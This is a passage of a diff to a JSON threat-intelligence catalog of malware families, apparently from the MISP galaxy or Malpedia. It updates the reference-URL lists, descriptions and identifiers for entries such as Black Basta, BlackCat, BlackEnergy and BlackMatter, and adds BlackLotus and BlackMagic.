"https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
- "https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware"
+ "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware",
+ "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware",
+ "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/",
+ "https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies",
+ "https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware",
+ "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
+ "https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/",
+ "https://www.zscaler.com/blogs/security-research/back-black-basta",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html",
+ "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta",
+ "https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/",
+ "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/",
+ "https://securityscorecard.pathfactory.com/all/a-deep-dive-into-bla",
+ "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/"
],
"synonyms": [
"no_name_software"
@@ -14569,31 +15477,33 @@
"type": []
},
"uuid": "ada47367-7e69-4122-b5c1-4e5aeb54f922",
- "value": "Black Basta"
+ "value": "Black Basta (Windows)"
},
{
"description": "Ransomware. Uses dropper written in JavaScript to deploy a .NET payload.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte",
- "https://www.ic3.gov/Media/News/2022/220211.pdf",
- "https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants",
"https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html",
- "https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html",
- "https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
"https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
- "https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure",
"https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte",
- "https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/",
- "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups",
+ "https://twitter.com/splinter_code/status/1628057204954652674",
+ "https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants",
+ "https://redcanary.com/blog/blackbyte-ransomware/",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/",
+ "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
"https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://www.ic3.gov/Media/News/2022/220211.pdf",
+ "https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/",
+ "https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html",
"https://de.darktrace.com/blog/detecting-the-unknown-revealing-uncategorised-ransomware-using-darktrace",
- "https://redcanary.com/blog/blackbyte-ransomware/"
+ "https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure",
+ "https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/",
+ "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups"
],
"synonyms": [],
"type": []
@@ -14606,46 +15516,57 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat",
- "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809",
- "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/",
- "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/",
- "https://blog.group-ib.com/blackcat",
- "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
- "https://killingthebear.jorgetesta.tech/actors/alphv",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html",
- "https://unit42.paloaltonetworks.com/blackcat-ransomware/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/",
- "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf",
- "https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html",
- "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
- "https://www.ic3.gov/Media/News/2022/220420.pdf",
- "https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware",
"https://www.intrinsec.com/alphv-ransomware-gang-analysis",
- "https://www.varonis.com/blog/alphv-blackcat-ransomware",
- "https://securelist.com/a-bad-luck-blackcat/106254/",
- "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
+ "https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware",
+ "https://id-ransomware.blogspot.com/2021/12/blackcat-ransomware.html",
+ "https://www.intrinsec.com/alphv-ransomware-gang-analysis/",
+ "https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
"https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
"https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware",
- "https://id-ransomware.blogspot.com/2021/12/blackcat-ransomware.html",
- "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/",
+ "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
+ "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809",
+ "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
+ "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/",
+ "https://www.varonis.com/blog/alphv-blackcat-ransomware",
+ "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/",
+ "https://securelist.com/a-bad-luck-blackcat/106254/",
+ "https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/",
+ "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf",
+ "https://www.ic3.gov/Media/News/2022/220420.pdf",
+ "https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html",
"https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/",
- "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/",
- "https://github.com/f0wl/blackCatConf",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack",
"https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
+ "https://unit42.paloaltonetworks.com/blackcat-ransomware/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://community.riskiq.com/article/47766fbd",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/",
+ "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
+ "https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html",
+ "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware",
+ "https://blog.group-ib.com/blackcat",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://killingthebear.jorgetesta.tech/actors/alphv",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps",
+ "https://github.com/f0wl/blackCatConf",
+ "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous"
],
"synonyms": [
"ALPHV",
@@ -14661,19 +15582,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee",
- "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
"https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/",
- "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf",
- "https://www.youtube.com/watch?v=NFJqD-LcpIg",
- "https://attack.mitre.org/groups/G0001/",
- "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://attack.mitre.org/software/S0069/",
"https://attack.mitre.org/groups/G0096",
- "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://attack.mitre.org/groups/G0025/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.youtube.com/watch?v=NFJqD-LcpIg",
+ "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1",
+ "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf",
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://attack.mitre.org/software/S0069/",
+ "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://attack.mitre.org/groups/G0025/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk"
],
"synonyms": [
"PNGRAT",
@@ -14690,43 +15611,36 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy",
- "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://attack.mitre.org/groups/G0034",
- "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
"https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf",
- "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf",
- "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
- "https://securelist.com/black-ddos/36309/",
"https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
+ "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
+ "https://securelist.com/black-ddos/36309/",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://attack.mitre.org/groups/G0034",
"http://pds15.egloos.com/pds/201001/01/66/BlackEnergy_DDoS_Bot_Analysis.pdf",
"https://threatconnect.com/blog/casting-a-light-on-blackenergy/",
- "https://marcusedmondson.com/2019/01/18/black-energy-analysis/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/",
"https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html",
+ "https://marcusedmondson.com/2019/01/18/black-energy-analysis/",
+ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
"https://www.secureworks.com/research/blackenergy2",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
"https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/",
- "https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection"
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf",
+ "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5a22cad7-65fa-4b7a-a7aa-7915a6101efa",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "82c644ab-550a-4a83-9b35-d545f4719069",
"value": "BlackEnergy"
},
@@ -14735,21 +15649,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackguard",
- "https://blog.cyble.com/2022/04/01/dissecting-blackguard-info-stealer/",
- "https://www.techtimes.com/articles/273752/20220331/new-password-stealing-malware-hacking-forum-hack-password-stealing-google-chrome-binance-outlook-telegram.htm",
- "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
- "https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data",
- "https://www.youtube.com/watch?v=Fd8WjxzY2_g",
- "https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html",
- "https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/",
"https://blogs.blackberry.com/en/2022/04/threat-thursday-blackguard-infostealer",
- "https://www.bleepingcomputer.com/news/security/new-blackguard-password-stealing-malware-sold-on-hacker-forums/",
- "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
- "https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5",
- "https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4",
- "https://cyberint.com/blog/research/blackguard-stealer/",
"https://ke-la.com/information-stealers-a-new-landscape/",
- "https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking"
+ "https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/",
+ "https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5",
+ "https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html",
+ "https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking",
+ "https://blog.cyble.com/2022/04/01/dissecting-blackguard-info-stealer/",
+ "https://www.bleepingcomputer.com/news/security/new-blackguard-password-stealing-malware-sold-on-hacker-forums/",
+ "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
+ "https://www.youtube.com/watch?v=Fd8WjxzY2_g",
+ "https://cyberint.com/blog/research/blackguard-stealer/",
+ "https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data",
+ "https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4",
+ "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
+ "https://www.techtimes.com/articles/273752/20220331/new-password-stealing-malware-hacking-forum-hack-password-stealing-google-chrome-binance-outlook-telegram.htm"
],
"synonyms": [],
"type": []
@@ -14762,11 +15676,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware",
- "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html",
- "https://news.sophos.com/en-us/2021/03/23/black-kingdom/",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html",
"https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://news.sophos.com/en-us/2021/03/23/black-kingdom/",
+ "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html",
"https://securelist.com/black-kingdom-ransomware/102873/",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
],
@@ -14776,65 +15690,94 @@
"uuid": "246b6563-edd8-49c7-9d3c-97dc1aec6b81",
"value": "BlackKingdom Ransomware"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus",
+ "https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/",
+ "https://www.binarly.io/posts/The_Untold_Story_of_the_BlackLotus_UEFI_Bootkit/index.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6d542c85-cf94-466f-97a2-eac3c50fbea2",
+ "value": "BlackLotus"
+ },
+ {
+ "description": "Ransomware",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmagic",
+ "https://blog.cyble.com/2022/12/07/a-closer-look-at-blackmagic-ransomware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "80735865-325c-4829-a6df-22e5d84735e6",
+ "value": "BlackMagic"
+ },
{
"description": "Ransomware-as-a-Service ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter",
- "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
- "https://blog.group-ib.com/blackmatter#",
- "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809",
- "https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
- "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
- "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.glimps.fr/lockbit3-0/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/",
- "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
- "https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf",
- "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.mandiant.com/resources/cryptography-blackmatter-ransomware",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
"https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
- "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
- "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
- "https://www.netskope.com/blog/netskope-threat-coverage-blackmatter",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
- "https://www.youtube.com/watch?v=NIiEcOryLpI",
- "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
"https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/",
- "https://twitter.com/GelosSnake/status/1451465959894667275",
- "https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809",
+ "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/",
"https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
- "https://blog.minerva-labs.com/blackmatter",
